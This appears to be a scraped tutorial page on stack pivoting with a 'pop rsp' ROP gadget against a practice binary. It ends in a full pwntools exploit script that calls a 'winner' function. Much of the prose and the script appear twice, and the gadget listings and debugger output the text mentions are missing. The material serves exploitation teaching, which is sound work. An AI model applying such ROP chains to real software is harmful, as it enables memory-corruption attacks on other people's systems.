1 of 1

pop rsp

Using a pop rsp gadget to stack pivot

Exploitation

Gadgets

FIrst off, let's grab all the gadgets. I'll use ROPgadget again to do so:

Now we have all the gadgets, let's chuck them into the script:

Testing the pop

Let's just make sure the pop works by sending a basic chain and then breaking on ret and stepping through.

If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2.

You may see that only the gadget + 2 more values were written; this is because our buffer length is limited, and this is the reason we need to stack pivot. Let's step through the first pop.

You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the 0x0 into r13.

What? We passed in 0x0 to the gadget!

Remember, however, that pop r13 is equivalent to mov r13, [rsp] - the value from the top of the stack is moved into r13. Because we moved RSP, the top of the stack moved to our buffer and AAAAAAAA was popped into it - because that's what the top of the stack points to now.

Full Payload

Now we understand the intricasies of the pop, let's just finish the exploit off. To account for the additional pop calls, we have to put some junk at the beginning of the buffer, before we put in the ropchain.

Final Exploit

pop rsp

Using a pop rsp gadget to stack pivot

Exploitation

Gadgets

FIrst off, let's grab all the gadgets. I'll use ROPgadget again to do so:

Now we have all the gadgets, let's chuck them into the script:

Testing the pop

Let's just make sure the pop works by sending a basic chain and then breaking on ret and stepping through.

If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2.

You may see that only the gadget + 2 more values were written; this is because our buffer length is limited, and this is the reason we need to stack pivot. Let's step through the first pop.

You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the 0x0 into r13.

What? We passed in 0x0 to the gadget!

Full Payload

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

POP_CHAIN = 0x401225                   # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
    0,                 # r13
    0,                 # r14
    0,                 # r15
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,               # r15
    elf.sym['winner']
)

payload = payload.ljust(104, b'A')     # pad to 104

payload += flat(
    POP_CHAIN,
    buffer             # rsp
)

pause()
p.sendline(payload)
print(p.recvline())

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

POP_CHAIN = 0x401225                   # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
    0,                 # r13
    0,                 # r14
    0,                 # r15
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,               # r15
    elf.sym['winner']
)

payload = payload.ljust(104, b'A')     # pad to 104

payload += flat(
    POP_CHAIN,
    buffer             # rsp
)

pause()
p.sendline(payload)
print(p.recvline())

pop rsp

hashtagExploitation

hashtagGadgets

hashtagTesting the pop

hashtagFull Payload

hashtagFinal Exploit

pop rsp

hashtagExploitation

hashtagGadgets

hashtagTesting the pop

hashtagFull Payload

hashtagFinal Exploit

Exploitation

Gadgets

Testing the pop

Full Payload

Final Exploit

Exploitation

Gadgets

Testing the pop

Full Payload

Final Exploit